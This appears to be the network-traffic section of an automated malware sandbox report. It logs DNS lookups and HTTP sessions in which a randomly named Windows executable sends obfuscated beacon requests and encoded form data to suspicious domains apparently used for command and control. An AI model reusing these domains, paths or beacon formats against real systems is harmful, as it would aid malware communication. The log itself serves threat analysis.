                                                                              Jan 10, 2025 18:53:54.811597109 CET5225653192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:53:55.811597109 CET5225653192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:53:56.911185026 CET53522561.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:53:56.911197901 CET53522561.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:53:56.911207914 CET53522561.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:54:12.935677052 CET6318953192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:54:12.951277971 CET53631891.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:54:27.221611977 CET5205253192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:54:27.348675966 CET53520521.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:55:19.981074095 CET6387353192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:55:20.181246996 CET53638731.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:55:33.472315073 CET6300453192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:55:34.232165098 CET53630041.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:55:47.912758112 CET5332453192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:55:48.570662975 CET53533241.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:56:02.956697941 CET5914753192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:56:03.151307106 CET53591471.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:56:16.378629923 CET5039153192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:56:16.394387007 CET53503911.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:57:08.425277948 CET5743253192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:57:08.478301048 CET53574321.1.1.1192.168.2.8
                                                                              Jan 10, 2025 18:57:22.252830982 CET6500653192.168.2.81.1.1.1
                                                                              Jan 10, 2025 18:57:22.507419109 CET53650061.1.1.1192.168.2.8

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 18:53:53.803040981 CET192.168.2.81.1.1.10x853eStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:53:54.811597109 CET192.168.2.81.1.1.10x853eStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:53:55.811597109 CET192.168.2.81.1.1.10x853eStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:12.935677052 CET192.168.2.81.1.1.10x3628Standard query (0)www.binjai77rtp11f.xyzA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:27.221611977 CET192.168.2.81.1.1.10x6487Standard query (0)www.vietnamtour.proA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:19.981074095 CET192.168.2.81.1.1.10xc6b5Standard query (0)www.showyourstyle.topA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:33.472315073 CET192.168.2.81.1.1.10x95deStandard query (0)www.rwse6wjx.sbsA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:47.912758112 CET192.168.2.81.1.1.10x5929Standard query (0)www.rokeyfashion.storeA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:02.956697941 CET192.168.2.81.1.1.10x4b17Standard query (0)www.lucelight.infoA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:16.378629923 CET192.168.2.81.1.1.10xe4eStandard query (0)www.zrichiod-riech.sbsA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:57:08.425277948 CET192.168.2.81.1.1.10x2708Standard query (0)www.absseguridad.onlineA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:57:22.252830982 CET192.168.2.81.1.1.10xef87Standard query (0)www.daystarcafe.netA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 18:53:56.911185026 CET1.1.1.1192.168.2.80x853eNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:53:56.911197901 CET1.1.1.1192.168.2.80x853eNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:53:56.911207914 CET1.1.1.1192.168.2.80x853eNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:12.951277971 CET1.1.1.1192.168.2.80x3628No error (0)www.binjai77rtp11f.xyz104.21.28.65A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:12.951277971 CET1.1.1.1192.168.2.80x3628No error (0)www.binjai77rtp11f.xyz172.67.144.150A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:27.348675966 CET1.1.1.1192.168.2.80x6487No error (0)www.vietnamtour.pro172.67.138.138A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:54:27.348675966 CET1.1.1.1192.168.2.80x6487No error (0)www.vietnamtour.pro104.21.54.126A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:20.181246996 CET1.1.1.1192.168.2.80xc6b5No error (0)www.showyourstyle.top69.57.163.64A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)www.rwse6wjx.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:34.232165098 CET1.1.1.1192.168.2.80x95deNo error (0)b1-3-r111.kunlundns.top101.32.205.61A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:48.570662975 CET1.1.1.1192.168.2.80x5929No error (0)www.rokeyfashion.storerokeyfashion.storeCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:55:48.570662975 CET1.1.1.1192.168.2.80x5929No error (0)rokeyfashion.store103.159.36.66A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:03.151307106 CET1.1.1.1192.168.2.80x4b17No error (0)www.lucelight.info103.168.172.37A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:03.151307106 CET1.1.1.1192.168.2.80x4b17No error (0)www.lucelight.info103.168.172.52A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:16.394387007 CET1.1.1.1192.168.2.80xe4eNo error (0)www.zrichiod-riech.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:56:16.394387007 CET1.1.1.1192.168.2.80xe4eNo error (0)www.zrichiod-riech.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:57:08.478301048 CET1.1.1.1192.168.2.80x2708No error (0)www.absseguridad.onlineabsseguridad.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 18:57:08.478301048 CET1.1.1.1192.168.2.80x2708No error (0)absseguridad.online84.32.84.32A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 18:57:22.507419109 CET1.1.1.1192.168.2.80xef87No error (0)www.daystarcafe.net208.91.197.27A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.3nhc3a.top
                                                                              • www.binjai77rtp11f.xyz
                                                                              • www.vietnamtour.pro
                                                                              • www.showyourstyle.top
                                                                              • www.rwse6wjx.sbs
                                                                              • www.rokeyfashion.store
                                                                              • www.lucelight.info
                                                                              • www.zrichiod-riech.sbs
                                                                              • www.absseguridad.online

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.84970920.2.208.137805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:53:56.933440924 CET466OUTGET /s1oh/?0FJ=D00hHLh&irCxl6=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTT37wm3kse0ebZeD1BOaz6lVPyMDO71Du749G1F/4BLBNXw== HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.3nhc3a.top
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:53:57.879105091 CET289INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Fri, 10 Jan 2025 17:53:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.849711104.21.28.65805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:13.171911001 CET746OUTPOST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 65 69 46 38 62 41 46 41 78 62 49 51 65 6e 59 52 7a 77 5a 6f 74 6e 4c 74 4b 4d 6a 31 65 49 53 48 67 45 4c 4f 49 41 3d
                                                                              Data Ascii: irCxl6=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGeiF8bAFAxbIQenYRzwZotnLtKMj1eISHgELOIA=
                                                                              Jan 10, 2025 18:54:13.696378946 CET827INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPnZWBPbvnGZRBQ3J646i5hEASYgfBrqgeN0VpWvfK2QZJP%2BOSQ05zs39%2Bxt8eBt6HwBb3SlL2XNf5SPqRvfnTxxi1pZh7bKV6%2FOqeDcTByxl5qvunEt4uoi3Zli8MiR9u5sM82epyOO"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe87f289cec33e-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2314&min_rtt=2314&rtt_var=1157&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                              Data Ascii: f
                                                                              Jan 10, 2025 18:54:13.696408033 CET1236INData Raw: 36 30 31 0d 0a ec 57 5b 73 1a b9 12 7e 4e aa f2 1f 7a e7 54 ed 13 62 8c 13 af 4f ed 82 2b e0 78 1d bc 04 53 86 ec b9 bc f5 8c 9a 41 b6 46 9a 95 04 98 ad fc f8 53 9a e1 32 80 01 3b 27 55 f6 83 79 60 46 ad ee 56 ab fb d3 d7 9a 77 6f eb 3f 7d ba 3e
                                                                              Data Ascii: 601W[s~NzTbO+xSAFS2;'Uy`FVwo?}>w#woUHgG|bp<ziyv>=o>ivK.7yv`e7W.,._z%|kSspQ7LF(D4kH
                                                                              Jan 10, 2025 18:54:13.696418047 CET308INData Raw: 83 4c fa 24 b9 e2 4f 26 87 db e9 fc d4 2e 78 c8 29 88 9c 62 36 cd 1f 53 34 ca 77 d4 ec 9e d5 16 17 98 7f 3c 94 5d a3 25 35 82 68 ec 9c bf 2d 16 a4 2a f3 ec 65 86 26 8f 89 61 09 a8 0d de 28 15 aa f8 00 62 de 23 2b ae a5 68 04 b2 91 e0 9c 54 23 70
                                                                              Data Ascii: L$O&.x)b6S4w<]%5h-*e&a(b#+hT#pfLaZYp34zlj7S:j];{^q/2*|7L1XvJdyS~{.Z(S/gRZ(w?&x\T<z_Y^ 4K/[
                                                                              Jan 10, 2025 18:54:13.780011892 CET1236INData Raw: 64 32 0d 0a 1a 80 04 e1 3b 5a 69 0c d6 8e 67 f0 c0 74 3c 83 47 13 c4 e0 4c 10 6e 03 93 20 dc 46 13 c4 60 6d 56 86 b8 0e 4c b3 32 c4 75 34 49 0c ce 24 e1 63 64 34 20 49 c2 c7 c8 68 34 49 0c ce 24 e1 1c 68 39 20 49 c2 39 d0 72 34 49 0c ce 24 11 12
                                                                              Data Ascii: d2;Zigt<GLn F`mVL2u4I$cd4 Ih4I$h9 I9r4I$20 j6clEh +I@Gz@^jEuLB:.'O(K/M$-uIM!KhK\]k^^X6ZYX1b7]o0aSw
                                                                              Jan 10, 2025 18:54:13.780030966 CET403INData Raw: 03 8b 5e 35 4a 51 6a 0a f5 aa 13 43 33 f4 ea c4 d0 0c 51 9d 00 00 00 00 ff ff 0d 0a 31 37 30 0d 0a ec 9c dd 4a c3 30 18 86 6f 25 97 b0 d0 f5 e7 02 86 9e 58 1c e2 0d d4 36 c6 d0 36 df 68 3b 70 5e bd 64 2a 64 66 83 38 82 90 e5 3d 4d 7b f4 1d e4 21
                                                                              Data Ascii: ^5JQjC3Q170J0o%X66h;p^d*df8=M{!y7o[-dHaZ+V\^rY[9C?IMbV4m78:gG2&(c75vw4I~kbq^9>qd%u&i^iR
                                                                              Jan 10, 2025 18:54:13.810874939 CET1236INData Raw: 32 39 65 0d 0a ec 9d 4d 4e c3 30 10 85 af 92 23 54 81 84 74 49 59 14 09 16 88 0d 6c 9d b6 6a 22 e5 07 c5 a9 54 ba e6 24 1c 8d 93 20 f3 57 13 03 4a 8b 81 18 7f 5b b3 1b d1 7e 9d f7 de cc e0 f4 ff 80 d3 3f 2c dc 61 f4 fb bc 75 39 cd 44 51 a4 d5 46
                                                                              Data Ascii: 29eMN0#TtIYlj"T$ WJ[~?,au9DQFh`"NRY%83f8R2RzC}N*f1&ZaL[nESM^0K53eC5f`X:m_1;32\xROR
                                                                              Jan 10, 2025 18:54:13.810893059 CET324INData Raw: ca 7f 54 6f 9d ed cd 60 13 b3 5f 64 13 b3 df c6 26 86 be 82 5b 97 40 67 44 4e 56 49 21 95 ee 18 2d c3 07 95 69 d7 96 b5 07 39 33 3d 97 a3 c5 e3 0c 19 67 c8 38 43 c6 44 0d e4 84 bf a1 91 aa 6a 8d 8d 05 66 af f6 a1 9b 60 f7 c8 8d 6d 60 ce bc 93 97
                                                                              Data Ascii: To`_d&[@gDNVI!-i93=g8CDjf`m`)S&akw&o{U{2S )j\@VtgRN3%Vld0+K%7().=}xGe:J}S7!YjkmaeE(B(e6: {h{w 7Zg&z
                                                                              Jan 10, 2025 18:54:13.859225988 CET1236INData Raw: 33 63 38 0d 0a ec 9d 4f 4f db 40 10 c5 bf ca de 7a 4d 68 ec 38 c7 92 16 10 6a 2b 5a aa d2 1e d7 ce 62 9b d8 5e 6b ff 24 b8 9f be 72 68 90 9d 85 6a 91 56 90 d5 be eb 3a a7 27 a1 1f 33 f3 de 0c d0 e2 e6 12 99 54 54 b4 a5 a0 8a 1d 1c bd 24 57 bb 57
                                                                              Data Ascii: 3c8OO@zMh8j+Zb^k$rhjV:'3TT$WWI|l@4$e+:Z\4Bi"`rAN~OY`\lgN3'parHp:f4mt:-srigTL$7#7`nC<IEY\$}h_]o[,
                                                                              Jan 10, 2025 18:54:13.859256029 CET676INData Raw: 02 61 82 10 e6 dc b0 34 e3 00 0a 2f 0e a0 88 12 07 50 60 3b f6 82 db 31 18 78 62 88 99 ce 10 b3 97 46 6c 6b 07 56 1e 5b 4e be d8 22 35 9c d4 40 96 10 64 b9 ec 59 9a e0 e2 f9 65 ce a2 f8 65 ce f2 f0 cb fc 7f 36 53 31 19 20 8c 2d 59 df 2f 2b d5 d1
                                                                              Data Ascii: a4/P`;1xbFlkV[N"5@dYee6S1 -Y/+'/JuV~A>~J6M$h"A0+.oG=SbJ$2SX1ua~>e1aiJo?VF]"=pTCR^Jr;V,AsLg28ah*
                                                                              Jan 10, 2025 18:54:13.870243073 CET1236INData Raw: 33 37 64 0d 0a ec 9d cd 6e db 30 10 84 5f 85 2f 50 40 51 24 4b 67 07 ad 63 f4 07 01 8c 5e 7a a3 64 56 62 22 91 06 29 a7 75 9e be 90 9a 20 b4 08 03 74 c1 b6 66 38 57 da 40 82 3d f8 c3 ee cc ce 02 30 7f 47 91 f9 ce 15 d3 83 e2 0f cc 6c 5d 3e 70 c5
                                                                              Data Ascii: 37dn0_/P@Q$Kgc^zdVb")u tf8W@=0Gl]>pfz&):[XH$_thOoSa C22cLs-o:&wtPtjANrbI#+6&dV LMk\Xsx-@Pe g
                                                                              Jan 10, 2025 18:54:13.870254993 CET160INData Raw: a8 cd e7 0f c0 4c 08 66 c6 35 c3 54 06 53 19 10 06 84 01 61 16 95 61 aa 5d 3f c0 cb da 30 41 0b 13 8e 96 9f 7a c5 89 15 af 3b 96 8b 74 c7 f2 34 ba 63 b7 f2 6f 7e 23 ed 31 78 c6 d0 1d 9b 55 f5 25 9c c0 05 73 25 4f a2 15 c1 68 4f 5e a9 45 e4 95 1a
                                                                              Data Ascii: Lf5TSaa]?0Az;t4co~#1xU%s%OhO^EL?)p\D0}/(6K0(+\#~8g"3lSN}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.849712104.21.28.65805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:15.726324081 CET766OUTPOST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 67 32 45 52 6b 74 5a 49 46 31 6a 58 31 71 6b 2b 76 42 51 57 4f 4f 54 6f 4d 2b 49 43 52 43 77 74 49 4b 62 4d 48 68 4f 6e 33 53 5a 4f 7a 6b 37 53 6e 65 65 55 69 4e 61 67 71 6c 63 44 67 70 37 73 50 30 53 38 49 4f 51 4f 58 58 78 36 45 79 48 4d 54 4c 69 70 57 75 44 33 50 34 35 65 42 57 54 48 50 77 71 52 41 4f 54 6e 35 2b 51 2f 47 63 4b 6b 56 2b 6f 54 58 59 35 34 46 61 55 7a 74 58 49 68 65 47 6f 34 52 2b 6a 6d 36 76 7a 63 39 34 75 6a 49 34 65 38 4f 65 50 69 6e 37 63 79 66 6a 44 55 56 6f 57 79 4c 52 34 66 72 74 50 67 74 4a 6b 56 77 70 56 36 64 44 55 37 51 66 57 63 7a 30 7a 31 76 61 59 7a 58 52 6a 31 75 49 54 74 37 6e 32 73
                                                                              Data Ascii: irCxl6=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRCwtIKbMHhOn3SZOzk7SneeUiNagqlcDgp7sP0S8IOQOXXx6EyHMTLipWuD3P45eBWTHPwqRAOTn5+Q/GcKkV+oTXY54FaUztXIheGo4R+jm6vzc94ujI4e8OePin7cyfjDUVoWyLR4frtPgtJkVwpV6dDU7QfWcz0z1vaYzXRj1uITt7n2s
                                                                              Jan 10, 2025 18:54:16.410479069 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lp0INm9M%2Bc9sed0GypPLsvWpGHxsHevcUfpzsnFfHmuIhW8kz0lKT5wUbk66%2FD4MRk5zs1ghkxubieqKgrER4tNYe3h31tzoS4WsSHo%2BAEcOon0fKeS8VOoT4miPA%2BYp8N%2Fsi35aSxrq"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe880368330f90-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=22706&min_rtt=22706&rtt_var=11353&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 63 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5a 6d 73 e2 38 12 fe 3c 53 35 ff a1 d7 57 b5 9f 10 0e 64 72 d9 dd 83 d4 00 c3 64 c8 12 c2 06 66 6f f7 be c9 76 63 2b 91 25 af 24 20 6c cd 8f bf 92 cd 8b 79 4f 72 73 0b 55 4b 3e c4 96 d4 dd 92 ba 1f 3d 2d 17 fd ee 6d e5 bb 8f 77 8d fe ef dd 26 44 26 e6 57 ef de 56 ec 13 38 15 61 d5 41 e1 5c bd 7b 0b 00 50 89 90 06 d3 f7 b4 fd 1d 21 60 98 e1 08 84 e4 fb d3 be ab fb 7e 17 da ad 5f 9b 50 6f 75 6e 6a ad cb 4b f8 0a f5 bb c6 dd 7d ad 03 b5 8f b7 ad 0e f4 da 77 7d b8 ae 35 ee ee e1 73 ed be 05 ad 4e 0b be c2 42 6f 2a 9c d3 cf 69 5c d7 6e bb b5 ce 35 dc 36 3b f6 d1 6f de 7f e9 7e ac f5 9b 15 37 9b 7e 65 9d 31 1a ba b2 cc b4 cb 8f a8 d2 68 aa ce 97 fe 27 f2 83 b3 36 2e 68 8c 55 67 c4 70 9c 48 65 1c f0 a5 30 28 4c d5 19 b3 c0 44 d5 00 47 cc 47 92 36 0a c0 04 33 8c 72 a2 7d ca b1 5a 2a 9e ad db 8b 8c 49 08 fe 31 64 a3 aa f3 1b f9 52 23 0d 19 27 d4 30 8f 63 ce 78 ab 59 c5 20 c4 dd ea 3e f5 23 24 56 47 49 9e 53 16 92 a4 43 bb b5 13 45 c3 98 be 58 0d 9f 12 a6 50 e7 [TRUNCATED]
                                                                              Data Ascii: 6ccZms8<S5Wdrdfovc+%$ lyOrsUK>=-mw&D&WV8aA\{P!`~_PounjK}w}5sNBo*i\n56;o~7~e1h'6.hUgpHe0(LDGG63r}Z*I1dR#'0cxY >#$VGISCEXP9-@+&ENP0`L Q%|:Pu*F>Lut`k,/0!90N#x:
                                                                              Jan 10, 2025 18:54:16.410507917 CET1236INData Raw: a2 68 b7 f0 e6 4d 7e f1 8f 38 19 4b 15 e4 37 5a 67 e2 81 b2 cb cb 02 28 93 c0 a2 35 7b b3 dd 85 b5 89 0b 4b ab 90 e9 26 0a e0 ad ed af 00 da ba 63 26 a0 53 37 2d 75 a5 db dc 20 34 ef 77 56 41 cf 99 78 cc 40 ff 26 ed 4b db 0a b9 c5 8e 90 82 f9 94
                                                                              Data Ascii: hM~8K7Zg(5{K&c&S7-u 4wVAx@&K;)TcH*3)zL~sdta6.vYLC`1f:#D*? g#Uh\'FE6b3Qv|R:F-ctR@!~(.t~ggy;i$o
                                                                              Jan 10, 2025 18:54:16.410521030 CET89INData Raw: 87 2e 14 10 f8 64 be 6d a1 80 b5 f8 7f 2d 14 e8 e0 93 f9 0b 8b 04 76 8d bf a4 24 6a 77 89 da fe d2 b4 5d 25 69 de 72 49 5a 25 2a ed 29 5f 5a 29 b5 7a 66 35 d3 b4 d6 2a 2d 6d 37 cc 87 2e a7 93 b5 48 54 dc a8 b4 5c 75 97 5b b8 2d dd d4 8b 4a c4 ff
                                                                              Data Ascii: .dm-v$jw]%irIZ%*)_Z)zf5*-m7.HT\u[-J
                                                                              Jan 10, 2025 18:54:16.454984903 CET1236INData Raw: 33 39 36 0d 0a ec 9c dd 4e db 30 14 c7 5f c5 aa 84 b8 8a 9a 94 54 69 19 54 62 08 a4 49 2b 43 62 1a da a5 93 ba 6d 86 63 57 b1 d3 34 5c ed 35 f6 7a 3c c9 e4 a4 05 e7 ab cd b6 ac 4d a8 6f 50 89 4e cc e1 d8 3e 3f 9d e3 bf 5b 2e ba 13 f2 88 37 4d 44
                                                                              Data Ascii: 396N0_TiTbI+CbmcW4\5z<MoPN>?[.7MDgtf6hLDeiX:*+lX=;Na7U_oy8mMw0b6v%_vpxtg@1ty,F@ZlUA;(l~RV\
                                                                              Jan 10, 2025 18:54:16.455007076 CET748INData Raw: 64 f0 c9 e0 93 25 09 97 75 26 69 e8 5e 69 b2 d0 52 55 d5 8f 7e 0b b2 f8 90 c5 1a 58 9c 60 71 14 32 1e 44 21 e3 50 c8 12 54 c8 10 cd 00 2c 5f b5 4b d2 e2 30 36 da 42 cb f3 9b 60 b5 59 66 b5 d0 c8 66 fe 44 99 f3 b3 8b 55 2e 2b 1d e6 94 41 98 53 82
